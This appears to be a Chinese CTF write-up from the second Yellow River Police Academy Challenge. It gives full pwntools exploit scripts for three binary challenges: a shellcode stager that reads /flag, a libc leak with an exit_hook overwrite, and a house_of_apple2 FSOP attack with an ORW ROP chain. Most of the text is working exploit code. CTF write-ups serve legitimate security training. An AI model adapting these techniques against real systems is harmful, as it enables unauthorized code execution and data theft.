第二届黄河警校挑战赛pwn

pwn1

read读7字节，控制一下寄存器和指令再次调用read系统调用，再读ORW的shellcode。

from pwn import *
from pwn import u64,u32,p64,p32
from ctypes import *
from libcfind import *
from LibcSearcher import *
import base64
import sys
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]
debug = 0
if debug:
    p = process('./pwn')
    elf = ELF('./pwn')
    # p = process('', env={'LD_PRELOAD':'./libc.so'})
    # gdb.attach(p)
else:
    p = remote('47.98.236.4', 5001)
    elf = ELF('./pwn')
# -----------------------------------------------------------------------
s = lambda data: p.send(data)
sa = lambda text, data: p.sendafter(text, data)
sl = lambda data: p.sendline(data)
sla = lambda text, data: p.sendlineafter(text, data)
r = lambda num=4096: p.recv(num)
rl = lambda text: p.recvuntil(text)
pr = lambda num=4096: sys.stdout.write(p.recv(num).decode())
inter = lambda: p.interactive()
l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00'))
uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00'))
int16 = lambda data: int(data, 16)
lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
# -----------------------------------------------------------------------
rl("Maybe you need to write some compilations\n")
payload = asm('pop rdx;syscall;')
# gdb.attach(p)
sl(payload)

payload = 'xor rax,rax;push 0x00;xor rsi,rsi;xor rdx,rdx;mov rbx,0x67616c662f;push rbx;push rsp;pop rdi;mov rax,2;syscall;'

payload += 'mov rdi,rax;mov rsi,0x600500;mov rdx,0x100;xor rax,rax;syscall;'

payload += 'mov rdi,1;mov rsi,0x600500;mov rdx,0x100;mov rax,1;syscall;'
pause()
sl(b'\x00\x00\x00'+ asm(payload))

inter()

pwn2

rand随机数进入到gift中，泄露了libc地址，然后能溢出返回地址低的6字节，返回到magic中，两次read，相当于一次任意地址写，然后打exit_hook。

from pwn import *
from pwn import u64,u32,p64,p32
from ctypes import *
from libcfind import *
from LibcSearcher import *
import base64
import sys
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]
debug = 0
if debug:
    p = process('./pwn')
    elf = ELF('./pwn')
    # p = process('', env={'LD_PRELOAD':'./libc.so'})
    # gdb.attach(p)
else:
    p = remote('47.98.236.4', 5002)
    elf = ELF('./pwn')
# -----------------------------------------------------------------------
s = lambda data: p.send(data)
sa = lambda text, data: p.sendafter(text, data)
sl = lambda data: p.sendline(data)
sla = lambda text, data: p.sendlineafter(text, data)
r = lambda num=4096: p.recv(num)
rl = lambda text: p.recvuntil(text)
pr = lambda num=4096: sys.stdout.write(p.recv(num).decode())
inter = lambda: p.interactive()
l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00'))
uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00'))
int16 = lambda data: int(data, 16)
lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
# -----------------------------------------------------------------------
libc = ELF('./libc-2.31.so')
libc = cdll.LoadLibrary('./libc-2.31.so')
libc.srand(libc.time(0))
v7 = libc.rand()
v6 = v7 % 0x6E
rl("please enter this challenge\n")
sl(str(v6))
rl("0x")
puts = int(p.recv(12), 16)
lg("puts", puts)
libc1 = ELF('./libc-2.31.so')
libc_base = puts - libc1.symbols['puts']
system = libc_base + libc1.symbols['system']
lg("libc_base", libc_base)
rl("Come and try it out")
bss = 0x4040F0
onegadget = [0xe3afe,0xe3b01,0xe3b04]
onegadget = libc_base + onegadget[0]
# onegadget_1 = onegadget&0xff
# onegadget_2 = (onegadget>>8)&0xff
# onegadget_3 = (onegadget>>16)&0xff
# onegadget_4 = (onegadget>>24)&0xff
# onegadget_5 = (onegadget>>32)&0xff
# onegadget_6 = (onegadget>>40)&0xff

# lg("ongegadget", onegadget)
# lg(onegadget_1, onegadget_1)
# lg(onegadget_2, onegadget_2)
# lg(onegadget_3, onegadget_3)
# print(bytes(onegadget_1))
# payload = b'a'*0x28 +bytes([onegadget_1, onegadget_2, onegadget_3, onegadget_4,onegadget_5, onegadget_6])
payload = b'\x00'*0x20 + p64(elf.got['exit']) + b'\xc1' + b'\x12' + b'\x40' + b'\x00'*3
s(payload)

rl("Congratulations on completing a big step")
s(p64(libc_base+0x222060+0xf08))

payload = p64(onegadget)
# gdb.attach(p,'b exit')
s(payload)


inter()

misc

找到这个包

删掉开头的垃圾字符。替换DASCTF就行。

pwn3

house_of_apple2打ORW

from pwn import *
from pwn import u64,u32,p64,p32
from ctypes import *
from libcfind import *
from LibcSearcher import *
import base64
import sys
context(os='linux', arch='amd64', log_level='debug')
context.terminal = ["tmux", "splitw", "-h"]
debug = 1
if debug:
    p = process('./pwn')
    elf = ELF('./pwn')
    # p = process('', env={'LD_PRELOAD':'./libc.so'})
    # gdb.attach(p)
else:
    p = remote('47.98.236.4', 5002)
    elf = ELF('./pwn')
# -----------------------------------------------------------------------
s = lambda data: p.send(data)
sa = lambda text, data: p.sendafter(text, data)
sl = lambda data: p.sendline(data)
sla = lambda text, data: p.sendlineafter(text, data)
r = lambda num=4096: p.recv(num)
rl = lambda text: p.recvuntil(text)
pr = lambda num=4096: sys.stdout.write(p.recv(num).decode())
inter = lambda: p.interactive()
l32 = lambda: u32(p.recvuntil(b'\xf7')[-4:].ljust(4, b'\x00'))
l64 = lambda: u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
uu32 = lambda: u32(p.recv(4).ljust(4, b'\x00'))
uu64 = lambda: u64(p.recv(6).ljust(8, b'\x00'))
int16 = lambda data: int(data, 16)
lg = lambda s, num: p.success('%s -> 0x%x' % (s, num))
# -----------------------------------------------------------------------
libc = ELF('./libc.so.6')
def add(index,size,content):
    rl("> ")
    sl('1')
    rl("Please enter yours Index: \n")
    sl(str(index))
    rl("Please enter yours Size: \n")
    sl(str(size))
    rl("Please enter yours Content: \n")
    s(content)
def delete(index):
    rl("> ")
    sl('2')
    rl("Please enter yours Index: \n")
    sl(str(index))
def show(index):
    rl("> ")
    sl('4')
    rl("Please enter yours Index: \n")
    sl(str(index))
def edit(index,content):
    rl("> ")
    sl('3')
    rl("Please enter yours Index: \n")
    sl(str(index))
    rl("Please enter yours Content: ")
    sl(content)
# gdb.attach(p,'b _IO_wdoallocbuf')
# for i in range(5):
#     add(i,0x70,'a')
for i in range(9):
    add(i,0x80,'a')
for i in range(8):
    delete(i)
show(7)
libc_leak = uu64()
lg('libc_leak',libc_leak)
libc_base = libc_leak - 0x1ecbe0
lg("libc_base",libc_base)
free_hook = libc_base + libc.sym['_IO_list_all']
IO_list_all = libc_base + libc.symbols['_IO_list_all']
lg("IO_list_all",IO_list_all)
IO_wfile_jumps = libc_base + libc.sym['_IO_wfile_jumps']
lg("IO_wfile_jumps",IO_wfile_jumps)
open = libc_base + libc.sym['open']
read = libc_base + libc.sym['read']
write = libc_base + libc.sym['write']
magic_gadget = libc_base  + 0x154dd0 + 26
lg("magic_gadget",magic_gadget)
stdout = libc_base + libc.sym['_IO_2_1_stdout_']
lg("stdout",stdout)
ret = 0x0000000000022679 + libc_base
pop_rsi = 0x000000000002601f + libc_base
pop_rdx_r12 = 0x0000000000119211 + libc_base
pop_rdi = 0x0000000000023b6a + libc_base
leave_ret = 0x00000000000578c8 + libc_base
pop_rbp = 0x00000000000226c0 + libc_base

for i in range(4):
    add(i+9,0x70,'a')

for i in range(4,-1,-1):
    delete(i+9)

show(9)
heap_leak = uu32()
lg('heap_leak',heap_leak)
heap_base = heap_leak-0x980
lg('heap_base',heap_base)
# edit(9,p64(IO_list_all))
'''
<svcudp_reply+26>:    mov    rbp,QWORD PTR [rdi+0x48]
<svcudp_reply+30>:    mov    rax,QWORD PTR [rbp+0x18]
<svcudp_reply+34>:    lea    r13,[rbp+0x10]
<svcudp_reply+38>:    mov    DWORD PTR [rbp+0x10],0x0
<svcudp_reply+45>:    mov    rdi,r13
<svcudp_reply+48>:    call   QWORD PTR [rax+0x28]
'''
orw1_addr = heap_base+0x1310
fake_file = p64(0)*3 + p64(1)
fake_file += p64(0) + p64(leave_ret) + p64(heap_base+0xb10) + p64(heap_base+0xcb8) + p64(heap_base+0xb08) + p64(orw1_addr)#此位置控制rbp
fake_file = fake_file.ljust(0x68,b'\x00')
fake_file += p64(stdout)
fake_file = fake_file.ljust(0x70,b'\x00')
fake_file = bytes(fake_file)

fake_file1 = p64(0)*2 + p64(heap_base+0x10d0) + p64(0)*6
fake_file1 += p64(IO_wfile_jumps)
fake_file1 = fake_file1.ljust(0x70,b'\x00')
fake_file1 = bytes(fake_file1)

edit(0,fake_file)
edit(1,fake_file1)

wide_data = p64(0)*2
wide_data = wide_data.ljust(0x70,b'\x00')
wide_data = bytes(wide_data)
edit(2,wide_data)

wide_data1 = p64(0)*10 + p64(heap_base+0x1150) + p64(magic_gadget)
wide_data1 = wide_data1.ljust(0x70,b'\x00')
wide_data1 = bytes(wide_data1)
edit(3,wide_data1)

edit(9,p64(IO_list_all))
add(13,0x70,'a')
add(14,0x70,p64(heap_base+0xfb0))

orw1 = b'/flag\x00\x00\x00'						#此位置控制rax+0x28=leave_ret
orw1 += p64(pop_rdx_r12) + p64(heap_base+0x1720) + p64(heap_base+0xfb0) + p64(pop_rdi) + p64(heap_base+0x1310) + p64(pop_rsi) + p64(0) + p64(open) + p64(pop_rbp) + p64(heap_base+0x1398) + p64(leave_ret)
edit(6,orw1)

orw2 = p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(heap_base+0x2000) + p64(pop_rdx_r12) + p64(0x50) + p64(0) + p64(read)
orw2 += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(heap_base+0x2000) + p64(pop_rdx_r12) + p64(0x50) + p64(0) + p64(write)

edit(7,orw2)

rl("> ")
sl('1')
rl("Please enter yours Index: \n")
sl('15')
rl("Please enter yours Size: \n")
sl(str(0x100))


inter()